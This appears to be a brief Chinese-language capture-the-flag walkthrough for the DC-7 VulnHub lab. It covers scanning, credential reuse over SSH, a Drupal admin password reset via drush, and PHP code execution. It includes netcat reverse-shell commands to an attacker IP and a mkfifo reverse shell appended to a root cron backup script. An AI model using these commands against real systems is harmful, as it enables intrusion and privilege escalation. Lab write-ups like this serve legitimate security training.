DC-7-vulnhub

靶机：http://www.five86.com/downloads/DC-7.zip
网络模式：NAT

arp-scan -l

192.168.194.167

nmap -p- -A 192.168.194.167  

22/tcp open ssh
80/tcp open http

在下面

在代码config.php中找到一个账号密码

$username = “dc7user”;
$password = “MdR3xOgB7#dW”;

在robots.txt中，发现登录界面路径

用之前的账号密码登不了，想起还有个22端口的ssh，试试，可以

查看mbox
虽然很长，但是内容基本重复，可以得到的信息是存在一个定时任务，备份数据库文件，参考

cat /opt/scripts/backups.sh

www-data 具有权限，需要获取相应shell，再利用backups.sh提权

drush 命令可以修改密码

drush user-password admin --password="123456"

登录网站

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

折叠查找更快

可以写php文件了

路径为首页

提权

nc -e /bin/bash 192.168.194.156 7777

nc -lvvp 7777

利用backups.sh文件提权

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.194.156 6666 >/tmp/f" >> backups.sh

另一个终端监听

通过邮件的时间可以得知该脚本每15分钟执行一次